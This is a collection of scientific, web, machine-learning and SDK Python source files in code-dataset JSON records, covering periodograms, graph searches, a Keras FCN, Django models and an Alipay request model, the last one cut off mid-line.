flux = self.fluxes\n \n # Define range of frequencies to search over\n minfreq = 1./maxP\n maxfreq = 1./minP\n \n # Make list of frequencies within the range\n frequency = np.linspace(minfreq,maxfreq,numIntervals)\n \n # Use LombScargle method to calculate power as a function of those frequencies\n power = LombScargle(self.times,flux,self.errors,nterms=i).power(frequency)\n \n # Find maximum power and frequency/period of maximum power\n maxp = np.max(power) \n maxind = np.argmax(power)\n \n maxfreq = frequency[maxind]\n best_period = 1./maxfreq\n \n if plot == True:\n # Plot power spectrum using lists from above\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(frequency,power)\n \n # Set axes limits\n ax.set(xlim=(frequency[0],frequency[-1]), ylim=(0,np.max(power)))\n ax.set_xlabel('Frequency (1/days)',fontsize=14)\n ax.set_ylabel('Power',fontsize=14)\n ax.set_title('Power vs. Freq. for {0}'.format(self.object),fontsize=18)\n \n # Plot line indicating period of system from SIMBAD\n if trueP != None:\n ax.vlines(1./trueP,0,1,linestyle='dashed',label='Published Period ({0:.3f} days)'.format(trueP),alpha=0.75)\n \n # Plot vertical line of best period\n ax.vlines(1./best_period,0,1,linestyle='dashed',label='Dominant Period ({0:.3f} days)'.format(best_period),color='red',alpha=0.5)\n ax.legend(loc='center left',bbox_to_anchor=(1, 0.5))\n \n return(maxp)\n \n # Function to calculate the false alarm probability of a radial velocity detection\n def FAP(self,numIterations):\n # Calculate stats of errors on RV measurements\n meanErr = np.mean(self.errors)\n stddevErr = np.std(self.errors)\n length = len(self.errors)\n \n # Empty list of maximum powers\n maxPowers = []\n numExceed = 0\n \n # Set number of iterations for loop\n numIterations = 10000\n \n # Calculate max power from non-noisy data\n original_maxPower = self.LS(35,45,1000,1,flux=self.fluxes)\n \n # Monte Carlo simulation of 10000 noise profiles\n # Used to calculate False Alarm Probability (FAP)\n for i in range(numIterations):\n \n # Generate Gaussian noise to add to RV measurements\n noise = np.random.normal(meanErr,stddevErr,length)\n \n # Add noise to RV measurements\n #newRVs = np.add(self.fluxes,noise)\n \n # Calculate maximum power in the Lomb-Scargle periodogram\n maxPower = self.LS(35,45,1000,1,flux=noise)\n maxPowers.append(maxPower)\n \n # Check if maximum power exceeds that of period in non-noisy data\n if maxPower > original_maxPower:\n numExceed += 1\n \n # Calculate FAP\n FAP = numExceed/numIterations\n print('FAP = {0:.3e}'.format(FAP))\n return(FAP)","sub_path":"HW3/PeriodicityTools.py","file_name":"PeriodicityTools.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"262556048","text":"import copy\nfrom collections import deque, namedtuple\nimport numpy as np\n\nfrom .priorityQueue import PriorityQueue\n\n\nclass Graph():\n\n\tdef __init__(self, V, E, W = None):\n\t\t# Adjacency List representation\n\t\tNode = namedtuple(\"Node\", [\"vertex\", \"edgeWeight\"])\n\n\t\t# If no weights were assigned, then list all as 1.\n\t\tif W is None:\n\t\t\tedges = ([Node(v, 1) for v in vs] for vs in E)\n\t\telse:\n\t\t\tedges = ([Node(v, w) for v, w in zip(vs, ws)] for vs, ws in zip(E, W))\n\t\tself.G = dict(zip(V, edges))\n\t\t# Create our Graph\n\n\t# G = {v: e for v, e in zip(V, E)}\n\t# Use this to generate Graph of our Vertix and Edges only when you\n\t# want to filter based on keys or values\n\n\tdef breadth_first_search(self, init_vertex: str = None) -> \"List of Search order\":\n\t\t'''\n\t\tEfficient algorithm for level-order searching through a graph.\n\t\t- Time complexity: O(log(n + m)) where n is # of nodes and m is # of edges.\n\t\t- Space complexity: O(log(n)) where n is the # of nodes that need to be \"discovered\".\n\n\t\t:param Char. init_vertix: Vertex to begin the search at.\n\n\t\tIdea:\n\n\t\t1. Add a node to the queue\n\t\t2. Remove node\n\t\t3. Retrieve unvisited neighbors of the removed node, add them to queue\n\t\t4. Repeat steps 1, 2, and 3 as long as the queue is not empty.\n\n\t\tNotes:\n\t\t- Works on directed and undirected graph.\n\t\t- Since a tree is a connected acyclic graph with n nodes, this algorithm is\n\t\t typically used for level-order traversal.\n\t\t- There can only be n - 1 edges, therefore time complexity can only be O(log(n)).\n\t\t- In-order traversal level by level then [left right] in binary list will\n\t\tinvolve exploring root node, then left tree then right tree.\n\n\t\t'''\n\n\t\tvertices = list(self.G.keys()) # Extract the list of vertices\n\t\tnum_vertices = vertices.__len__()\n\t\t# Initialize list of tuples denoting all vertices are yet to be found.\n\t\tdiscovered = dict(zip(vertices, [False] * num_vertices))\n\t\t# Initialize list of tuples denoting all vertices parents in new search tree.\n\t\t# parent = dict(zip(vertices, [None] * num_vertices))\n\t\torder = []\n\n\t\tqueue = deque(maxlen=num_vertices) # Treat our double-ended queue as a queue\n\n\t\t# Begin from a random Vertex\n\t\trand_index = np.random.randint(0, num_vertices - 1)\n\t\tinit_vertex = vertices[rand_index] if init_vertex is None else init_vertex.upper()\n\t\tdiscovered[init_vertex] = True\n\t\t# Enqueue the initial vertex.\n\t\tqueue.append(init_vertex)\n\t\twhile queue:\n\t\t\t# While the queue is not empty we explore the first queued node.\n\n\t\t\t# Dequeue the current vertex <- \"Explored\" i.e. we do stuff with current node.\n\t\t\tcurr_node = queue.popleft() \n\t\t\t#####\t\t\t\t\t\t\t\t\t\t\t########\n\t\t\t# This is the space in your algorithm where you do stuff.\n\t\t\t#####\t\t\t\t\t\t\t\t\t\t\t########\n\n\t\t\torder.append(curr_node) # Only used for unittesting correctness.\n\t\t\t\n\t\t\tfor incident_vertex in self.G[curr_node]:\n\t\t\t\t# for each current node, you will add all incident nodes\n\t\t\t\t# to the queue if they have not been discovered.\n\t\t\t\tif not discovered[incident_vertex.vertex]:\n\t\t\t\t\tdiscovered[incident_vertex.vertex] = True\n\t\t\t\t\t# parent[incident_vertex] = curr_node\n\t\t\t\t\tqueue.append(incident_vertex.vertex)\n\t\treturn order\n\n\tdef depth_first_search(self, init_vertex: str = None) -> \"List of search order\":\n\t\t'''\n\t\tEfficient algorithm for post-order traversal through a graph.\n\t\t- Time complexity: O(log(n + m)) where n is # of nodes and m is # of edges.\n\t\t- Space complexity: O(log(n)) where n is the # of nodes that need to be \"explored\".\n\n\t\t:param Char. init_vertix: Vertex to begin the search at.\n\n\t\tIdea:\n\n\t\t1. Add a node to the stack\n\t\t2. Remove node\n\t\t3. Retrieve unexplored neighbors of the removed node, add them to stack\n\t\t4. Repeat steps 1, 2, and 3 as long as the stack is not empty.\n\n\t\tNotes:\n\t\tFor Binary Search Trees:\n\t\t- Pre-order traversal [current left right] in binary list will involve exploring\n\t\t root node, then left tree then right tree.\n\t\t- In-order traversal [left current right]\n\t\t- Post-order traversal [left right current]\n\t\t'''\n\t\tvertices = list(self.G.keys()) # Extract the list of vertices\n\t\tnum_vertices = vertices.__len__()\n\t\t# Initialize list of tuples denoting all vertices are yet to be found.\n\t\texplored = dict(zip(vertices, [False] * num_vertices))\n\t\t# Initialize list of tuples denoting all vertices parents in new search tree.\n\t\t# parent = dict(zip(vertices, [None] * num_vertices))\n\t\torder = []\n\n\t\tstack = deque(maxlen=num_vertices) # Treat our double-ended queue as a stack\n\n\t\t# Begin from a random Vertex\n\t\trand_index = np.random.randint(0, num_vertices - 1)\n\t\tinit_vertex = vertices[rand_index] if init_vertex is None else init_vertex.upper()\n\t\t# Add first vertex\n\t\tstack.append(init_vertex)\n\t\twhile stack: # While the stack is not empty we explore latest node added\n\t\t\tcurr_node = stack.pop()\n\t\t\torder.append(curr_node)\n\t\t\tif not explored[curr_node]:\n\t\t\t\t# This is the space in your algorithm where you do stuff.\n\t\t\t\t# print(f\"Processed {curr_node}!\")\n\t\t\t\texplored[curr_node] = True\n\n\t\t\t\t# Order of items placed on stack dictated by V order.\n\t\t\t\tfor incident_node in self.G[curr_node]:\n\t\t\t\t\tif not explored[incident_node.vertex]:\n\t\t\t\t\t\t# parent[incident_node] = curr_node\n\t\t\t\t\t\tstack.append(incident_node.vertex)\n\t\treturn order\n\n\n\tdef dijkstra(self, init_vert):\n\t\t'''\n\t\tUsed for solving the shortest path problem on\n\t\tgraph with nonnegative weight for each edge.\n\t\ti.e. finding a path between two nodes\n\t\ts.t. sum of constituent weights is minimized.\n\t\tGreedy algorithm because it nearsightedly always\n\t\tchooses to relax the shorted-path tree.\n\t\t:return Dictionary Tuple where target_dist is shortest-path tree\n\t\tand parent is dictionary assigning node inheritance\n\t\t'''\n\n\t\tparent = {}\n\t\t# Populate target distance dictionary with infinities\n\t\t# Except for the initial vertex.\n\t\ttarget_dist = {vert: float(\"inf\") for vert in self.G.keys()\n\t\t if vert != init_vert}\n\t\ttarget_dist[init_vert] = 0\n\t\tdist_queue = PriorityQueue()\n\n\t\t# Populate priority queue with node and distance pairs.\n\t\tfor vert in target_dist.keys():\n\t\t\tdist_queue.add(vert, target_dist[vert]) # (distance, vertex)\n\n\t\twhile dist_queue:\n\t\t\tcurr = dist_queue.pop()\n\t\t\tfor incident_node in self.G[curr.task]:\n\t\t\t\tif curr.priority + incident_node.edgeWeight < target_dist[incident_node.vertex]:\n\t\t\t\t\ttarget_dist[incident_node.vertex] = curr.priority + incident_node.edgeWeight\n\t\t\t\t\t# Perform Relaxation on target distance dictionary\n\t\t\t\t\t# if we can find a shorter path from init_vert to target.\n\t\t\t\t\tdist_queue.add(incident_node.vertex, target_dist[incident_node.vertex])\n\t\t\t\t\t# Add the current node as the parent, for future pathing.\n\t\t\t\t\tparent[incident_node.vertex] = curr.task\n\n\t\treturn {\"target_dist\": target_dist, \"parent\": parent}\n\n\n\t# def prims(self):\n\t# \t\"\"\"\n\t# \tFind a minimum spanning tree T of an undirected, positively\n\t# \tweighted, connected graph G. Returns a tree T which contains\n\t# \tall original vertices V, but subset of edges.\n\t# \tGreedy algorithm because it nearsightedly selects\n\t# \tlowest edge weight\n\t# \t:return:\n\t# \t\"\"\"\n\t# \tvertices = copy.deepcopy(self.G.keys())\n\t# \tpass\n","sub_path":"datastructures/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"548616480","text":"\"\"\"Fully Convolutional Neural Networks.\"\"\"\nfrom __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals\n)\nimport abc\nimport six\nfrom keras.models import Model\nfrom keras.layers import (\n Input,\n Dropout,\n Lambda\n)\nfrom keras.layers.convolutional import (\n Conv2D,\n Conv2DTranspose,\n MaxPooling2D,\n ZeroPadding2D,\n Cropping2D\n)\nfrom keras.layers.merge import add\nfrom keras import backend as K\n\n\nDEBUG = 0\n\n\ndef _crop(target_layer, offset=(None, None), name=None):\n \"\"\"Crop the bottom such that it has the same shape as target_layer.\"\"\"\n def f(input):\n width = input._keras_shape[ROW_AXIS]\n height = input._keras_shape[COL_AXIS]\n target_width = target_layer._keras_shape[ROW_AXIS]\n target_height = target_layer._keras_shape[COL_AXIS]\n cropped = Cropping2D(cropping=((offset[0],\n width - offset[0] - target_width),\n (offset[1],\n height - offset[1] - target_height)),\n name='{}'.format(name))(input)\n return cropped\n return f\n\n\nclass BaseNet(object):\n \"\"\"Abstract BaseNet for FCN.\"\"\"\n\n def __new__(cls, *args, **kwargs):\n \"\"\"New method.\"\"\"\n return super(BaseNet, cls).__new__(cls).__call__(*args, **kwargs)\n\n def __call__(self, *args, **kwargs):\n \"\"\"Call method.\"\"\"\n return self._build.__func__\n\n @abc.abstractmethod\n def _build(input):\n \"\"\"Build method.\"\"\"\n \"\"\"Build the basenet on top of input.\n\n Arguments:\n input: Tensor of inputs.\n Returns:\n skip_layers: A list of upsampling entries for the skip\n architecture.\"\"\"\n return [input]\n\n\nclass VGG16(BaseNet):\n \"\"\"VGG base net.\n\n Examples:\n skip_layers = VGG16()(Input(shape=(26, 26, 3)))\n \"\"\"\n\n def _build(input):\n pad1 = ZeroPadding2D(padding=(100, 100))(input)\n conv1_1 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='valid', name='conv1_1')(pad1)\n conv1_2 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv1_2')(conv1_1)\n pool1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool1')(conv1_2)\n # Block 2\n conv2_1 = Conv2D(filters=128, kernel_size=(3, 3),\n activation='relu',\n padding='same', name='conv2_1')(pool1)\n conv2_2 = Conv2D(filters=128, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv2_2')(conv2_1)\n pool2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool2')(conv2_2)\n # Block 3\n conv3_1 = Conv2D(filters=256, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv3_1')(pool2)\n conv3_2 = Conv2D(filters=256, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv3_2')(conv3_1)\n conv3_3 = Conv2D(filters=256, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv3_3')(conv3_2)\n pool3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool3')(conv3_3)\n # Block 4\n conv4_1 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv4_1')(pool3)\n conv4_2 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv4_2')(conv4_1)\n conv4_3 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv4_3')(conv4_2)\n pool4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool4')(conv4_3)\n # Block 5\n conv5_1 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv5_1')(pool4)\n conv5_2 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv5_2')(conv5_1)\n conv5_3 = Conv2D(filters=512, kernel_size=(3, 3), activation='relu',\n padding='same', name='conv5_3')(conv5_2)\n pool5 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),\n padding='same', name='pool5')(conv5_3)\n # fully conv\n fc6 = Conv2D(filters=4096, kernel_size=(7, 7),\n activation='relu', padding='valid',\n name='fc6')(pool5)\n drop6 = Dropout(0.5)(fc6)\n fc7 = Conv2D(filters=4096, kernel_size=(1, 1),\n activation='relu', padding='valid',\n name='fc7')(drop6)\n drop7 = Dropout(0.5)(fc7)\n return [drop7, pool4, pool3]\n\n\ndef _get_basenet(identifier):\n \"\"\"Get basenet by identifier.\"\"\"\n if isinstance(identifier, six.string_types):\n basenet = globals().get(identifier.upper())\n if not basenet:\n raise ValueError('Invalid {}'.format(identifier))\n return basenet\n else:\n raise ValueError('Invalid {}. A string expected.'.format(identifier))\n\n\ndef _handle_data_format():\n \"\"\"Image data format handler.\"\"\"\n global ROW_AXIS\n global COL_AXIS\n global CHANNEL_AXIS\n if K.image_data_format() == 'channels_last':\n ROW_AXIS = 1\n COL_AXIS = 2\n CHANNEL_AXIS = 3\n else:\n CHANNEL_AXIS = 1\n ROW_AXIS = 2\n COL_AXIS = 3\n\n\ndef FCN(basenet='vgg16', num_output=21,\n input_shape=(None, None, 3)):\n \"\"\"Instantiate the FCN8s architecture with keras.\n\n # Arguments\n basenet: type of basene {'vgg16'}\n num_output: number of classes\n input_shape: input image shape\n # Returns\n A Keras model instance\n \"\"\"\n _handle_data_format()\n basenet = _get_basenet(basenet)\n # input\n input = Input(shape=input_shape)\n # Get skip_layers=[drop7, pool4, pool3] from the base net: VGG16\n skip_layers = basenet(skip_architecture=True)(input)\n\n drop7 = skip_layers[0]\n score_fr = Conv2D(filters=num_output, kernel_size=(1, 1),\n padding='valid',\n name='score_fr')(drop7)\n upscore2 = Conv2DTranspose(filters=num_output, kernel_size=(4, 4),\n strides=(2, 2), padding='valid', use_bias=False,\n data_format=K.image_data_format(),\n name='upscore2')(score_fr)\n # scale pool4 skip for compatibility\n pool4 = skip_layers[1]\n scale_pool4 = Lambda(lambda x: x * 0.01, name='scale_pool4')(pool4)\n score_pool4 = Conv2D(filters=num_output, kernel_size=(1, 1),\n padding='valid', name='score_pool4')(scale_pool4)\n score_pool4c = _crop(upscore2, offset=(5, 5),\n name='score_pool4c')(score_pool4)\n fuse_pool4 = add([upscore2, score_pool4c])\n upscore_pool4 = Conv2DTranspose(filters=num_output, kernel_size=(4, 4),\n strides=(2, 2), padding='valid',\n use_bias=False,\n data_format=K.image_data_format(),\n name='upscore_pool4')(fuse_pool4)\n # scale pool3 skip for compatibility\n pool3 = skip_layers[2]\n scale_pool3 = Lambda(lambda x: x * 0.0001, name='scale_pool3')(pool3)\n score_pool3 = Conv2D(filters=num_output, kernel_size=(1, 1),\n padding='valid', name='score_pool3')(scale_pool3)\n score_pool3c = _crop(upscore_pool4, offset=(9, 9),\n name='score_pool3c')(score_pool3)\n fuse_pool3 = add([upscore_pool4, score_pool3c])\n # score\n upscore8 = Conv2DTranspose(filters=num_output, kernel_size=(16, 16),\n strides=(8, 8), padding='valid',\n use_bias=False,\n data_format=K.image_data_format(),\n name='upscore8')(fuse_pool3)\n score = _crop(input, offset=(31, 31), name='score')(upscore8)\n\n # model\n model = Model(input, score, name='fcn_vgg16')\n\n return model\n","sub_path":"fcn/fcn.py","file_name":"fcn.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"194792465","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Get DrugCentral as OBO.\"\"\"\n\nimport logging\nfrom typing import Iterable\n\nimport bioversions\nimport pandas as pd\n\nfrom pyobo.struct import Obo, Reference, Term\nfrom pyobo.utils.path import ensure_df\n\nlogger = logging.getLogger(__name__)\n\nPREFIX = \"drugcentral\"\nURL = \"http://unmtid-shinyapps.net/download/structures.smiles.tsv\"\n\n\ndef get_obo(force: bool = False) -> Obo:\n \"\"\"Get DrugCentral OBO.\"\"\"\n version = bioversions.get_version(PREFIX)\n return Obo(\n ontology=PREFIX,\n name=\"DrugCentral\",\n data_version=version,\n iter_terms=iter_terms,\n iter_terms_kwargs=dict(version=version, force=force),\n auto_generated_by=f\"bio2obo:{PREFIX}\",\n )\n\n\ndef iter_terms(version: str, force: bool = False) -> Iterable[Term]:\n \"\"\"Iterate over DrugCentral terms.\"\"\"\n df = ensure_df(PREFIX, url=URL, version=version, force=force)\n for smiles, inchi, inchi_key, drugcentral_id, drugcentral_name, cas in df.values:\n if pd.isna(smiles) or pd.isna(inchi) or pd.isna(inchi_key):\n logger.warning(\"missing data for drugcentral:%s\", drugcentral_id)\n continue\n term = Term.from_triple(prefix=PREFIX, identifier=drugcentral_id, name=drugcentral_name)\n term.append_xref(Reference(prefix=\"inchikey\", identifier=inchi_key))\n term.append_property(\"smiles\", smiles)\n term.append_property(\"inchi\", inchi)\n if pd.notna(cas):\n term.append_xref(Reference(prefix=\"cas\", identifier=cas))\n yield term\n\n\nif __name__ == \"__main__\":\n get_obo(force=True).write_default(write_obo=True)\n","sub_path":"src/pyobo/sources/drugcentral.py","file_name":"drugcentral.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"297372225","text":"#!/usr/bin/env python3\n\"\"\"\nEnumerating oriented gene orderings\nUsage: ./sign.py [input file]\n\"\"\"\n\nimport sys\nimport argparse\nfrom tools import check_input, read_fasta\nfrom perm import factorial, permHelper\n\ndef main():\n check_input(sys.argv[0])\n enum_list = []\n with open(sys.argv[1]) as infile:\n num = int(infile.readline().strip())\n print((2**num) * factorial(num))\n get_signs(num, enum_list)\n for l in enum_list:\n permHelper(l, 0, len(l)-1)\n\ndef get_signs(end, total_list, current=1, num_list=[]):\n \"\"\"Returns all possible enumerations of num (both positive and negative).\"\"\"\n if current > end:\n total_list.append(num_list.copy())\n return\n nums = [current, -current]\n for num in nums:\n num_list.append(str(num))\n get_signs(end, total_list, current + 1, num_list)\n num_list.pop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sign.py","file_name":"sign.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"23970015","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom uuslug import uuslug\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\n\nclass Post(models.Model):\n user = models.ForeignKey(User, related_name='posts_created')\n name = models.CharField(max_length=200, verbose_name='歌名')\n slug = models.CharField(max_length=500, blank=True)\n description = models.TextField(verbose_name='描述')\n created = models.DateTimeField(auto_now_add=True)\n available = models.BooleanField(default=True)\n # 音乐风格\n MUSIC_GENRE_CHOICES = (\n ('classic', '经典'),\n ('country', '乡村'),\n ('electronic', '电子音乐'),\n ('folk', '民族'),\n ('blues', '蓝调'),\n ('jazz', '爵士'),\n ('pop', '流行'),\n ('r_and_b','R&B'),\n ('rock', '摇滚'),\n ('other', '其他'),\n )\n genre = models.CharField(max_length=200, choices=MUSIC_GENRE_CHOICES, default='pop', verbose_name='风格')\n audio_file = models.FileField(upload_to='audios/%Y/%m/%d', verbose_name='音乐文件')\n\n class Meta:\n ordering = ['-created']\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n self.slug = uuslug(self.name, instance=self)\n super(Post, self).save(*args, **kwargs)\n\n def get_absolute_url(self):\n return reverse('dkmusic:detail', args=[self.slug])\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(Post, related_name='comments')\n user = models.ForeignKey(User, related_name='comments_created')\n created = models.DateTimeField(auto_now_add=True)\n body = models.TextField(verbose_name='评论')\n available = models.BooleanField(default=True)\n\n class Meta:\n ordering = ('-created',)\n\n def __str__(self):\n return '{} commented by {}'.format(self.post, self.user)\n","sub_path":"dkmusic/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"181644796","text":"#!/usr/bin/env python\nimport _init_paths\nimport caffe\nimport argparse\n\ndef parse_args():\n '''\n Parse arguments\n '''\n parser = argparse.ArgumentParser(description=\"Parameters transfer\")\n parser.add_argument('--solver', dest='solver',\n help='solver prototxt', type=str)\n parser.add_argument('--weights', dest='weights',\n help='Weights to transfer', type=str)\n parser.add_argument('--layers', dest='layers',\n help='FC layers to transfer, like fc6,fc7', type=str)\n\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n print(args)\n\n caffe.set_mode_gpu()\n caffe.set_device(1)\n\n # load caffe reference model\n reference_model = caffe.Net(args.solver, args.weights, caffe.TEST)\n\n for layername, layerparam in reference_model.params.items():\n print(layername, layerparam[0].data.shape)\n\n layernames = args.layers.split(',')\n for layername in layernames:\n convname = layername+'_conv'\n reference_model.params[convname][0].data.flat = \\\n reference_model.params[layername][0].data.flat\n reference_model.params[convname][1].data[...] = \\\n reference_model.params[layername][1].data\n\n reference_model.save('data/imagenet_models/transferred_CaffeNet.v2.caffemodel')\n","sub_path":"tools/param_surgery.py","file_name":"param_surgery.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"85989791","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport copy\n\nfrom polyaxon.exceptions import PolyaxonfileError\nfrom polyaxon.polyflow import V1Environment\n\n\ndef validate(spec, data):\n \"\"\"Validates the data and creates the config objects\"\"\"\n data = copy.deepcopy(data)\n validated_data = {}\n\n def validate_keys(section, config, section_data):\n extra_args = [\n key for key in section_data.keys() if key not in config.SCHEMA().fields\n ]\n if extra_args:\n raise PolyaxonfileError(\n \"Extra arguments passed for `{}`: {}\".format(section, extra_args)\n )\n\n def add_validated_section(section, config):\n if data.get(section):\n section_data = data[section]\n validate_keys(section=section, config=config, section_data=section_data)\n validated_data[section] = config.from_dict(section_data)\n\n add_validated_section(spec.ENVIRONMENT, V1Environment)\n\n return validated_data\n","sub_path":"core/polyaxon/polyaxonfile/specs/libs/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"407932721","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport sys\nimport argparse\n\n\ndef solve_10():\n \"\"\"\n 10. 行数のカウント\n 行数をカウントせよ.確認にはwcコマンドを用いよ.\n\n wc -l\n \"\"\"\n line_num = 0\n for _ in sys.stdin:\n line_num += 1\n return line_num\n\n\ndef solve_11():\n \"\"\"\n 11. タブをスペースに置換\n タブ1文字につきスペース1文字に置換せよ.確認にはsedコマンド,trコマンド,もしくはexpandコマンドを用いよ.\n\n cat hightemp.txt|tr $'\\t' ' '\n \"\"\"\n repl = lambda x: x.rstrip('\\n').replace('\\t', ' ')\n lines = (repl(line) for line in sys.stdin)\n\n return '\\n'.join(lines)\n\n\ndef solve_12():\n \"\"\"\n 12. 1列目をcol1.txtに,2列目をcol2.txtに保存\n 各行の1列目だけを抜き出したものをcol1.txtに,2列目だけを抜き出したものをcol2.txtとしてファイルに保存せよ.確認にはcutコマンドを用いよ.\n\n\n \"\"\"\n with open('./col1.txt', 'w') as fout_col1, open('./col2.txt', 'w') as fout_col2:\n for line in sys.stdin:\n cols = line.rstrip('\\n').split('\\t')\n\n fout_col1.writelines([cols[0], '\\n'])\n fout_col2.writelines([cols[1], '\\n'])\n\n\ndef solve_13():\n \"\"\"\n 13. col1.txtとcol2.txtをマージ\n 12で作ったcol1.txtとcol2.txtを結合し,元のファイルの1列目と2列目をタブ区切りで並べたテキストファイルを作成せよ.確認にはpasteコマンドを用いよ.\n\n paste col1.txt col2.txt\n \"\"\"\n with open('./col1.txt', 'r') as fin_col1, open('./col2.txt', 'r') as fin_col2, \\\n open('./merged_col.txt', 'w') as fout:\n for line1, line2 in zip(fin_col1, fin_col2):\n line1 = line1.rstrip()\n line2 = line2.rstrip()\n\n fout.writelines([line1, '\\t', line2, '\\n'])\n\n\ndef solve_14(n=1):\n \"\"\"\n 14. 先頭からN行を出力\n 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち先頭のN行だけを表示せよ.確認にはheadコマンドを用いよ.\n\n cat hightemp.txt | head -8\n \"\"\"\n return '\\n'.join([line.rstrip('\\n') for i, line in enumerate(sys.stdin) if i < n])\n\n\ndef solve_15(n=1):\n \"\"\"\n 15. 末尾のN行を出力\n 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち末尾のN行だけを表示せよ.確認にはtailコマンドを用いよ.\n\n cat hightemp.txt | tail -8\n \"\"\"\n lines = [line.rstrip('\\n') for line in sys.stdin]\n return '\\n'.join(lines[-n:])\n\n\nif __name__ == \"__main__\":\n # print(solve_10())\n # print(solve_11())\n # solve_12()\n # solve_13()\n\n parser = argparse.ArgumentParser(description='課題14')\n parser.add_argument('-n', type=int, default=5, help='先頭から表示する行数N')\n args = parser.parse_args()\n # print(solve_14(n=args.n))\n print(solve_15(n=args.n))\n","sub_path":"chap_02/nlp100_chap2.py","file_name":"nlp100_chap2.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"605856020","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\nfrom alipay.aop.api.domain.IotDevicePrincipal import IotDevicePrincipal\n\n\nclass AlipayCommerceIotMdeviceprodDeviceBindModel(object):\n\n def __init__(self):\n self._biz_tid = None\n self._device_sn = None\n self._ext_info = None\n self._identify_type = None\n self._principal = None\n self._supplier_id = None\n\n @property\n def biz_tid(self):\n return self._biz_tid\n\n @biz_tid.setter\n def biz_tid(self, value):\n self._biz_tid = value\n @property\n def device_sn(self):\n return self._device_sn\n\n @device_sn.setter\n def device_sn(self, value):\n self._device_sn = value\n @property\n def ext_info(self):\n return self._ext_info\n\n @ext_info.setter\n def ext_info(self, value):\n self._ext_info = value\n @property\n def identify_type(self):\n return self._identify_type\n\n @identify_type.setter\n def identify_type(self, value):\n self._identify_type = value\n @property\n def principal(self):\n return self._principal\n\n @principal.setter\n def principal(self, value):\n if isinstance(value, list):\n self._principal = list()\n for i in value:\n if isinstance(i, IotDevicePrincipal):\n self._principal.append(i)\n else:\n self._principal.append(IotDevicePrincipal.from_alipay_dict(i))\n @property\n def supplier_id(self):\n return self._supplier_id\n\n @supplier_id.setter\n def supplier_id(self, value):\n self._supplier_id = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.biz_tid:\n if hasattr(self.biz_tid, 'to_alipay_dict'):\n params['biz_tid'] = self.biz_tid.to_alipay_dict()\n else:\n params['biz_tid'] = self.biz_tid\n if self.device_sn:\n if hasattr(self.device_sn, 'to_alipay_dict'):\n params['device_sn'] = self.device_sn.to_alipay_dict()\n else:\n params['device_sn'] = self.device_sn\n if self.ext_info:\n if hasattr(self.ext_info, 'to_alipay_dict'):\n params['ext_info'] = self.ext_info.to_alipay_dict()\n else:\n params['ext_info'] = self.ext_info\n if self.identify_type:\n if hasattr(self.identify_type, 'to_alipay_dict'):\n params['identify_type'] = self.identify_type.to_alipay_dict()\n else:\n params['identify_type'] = self.identify_type\n if self.principal:\n if isinstance(self.principal, list):\n for i 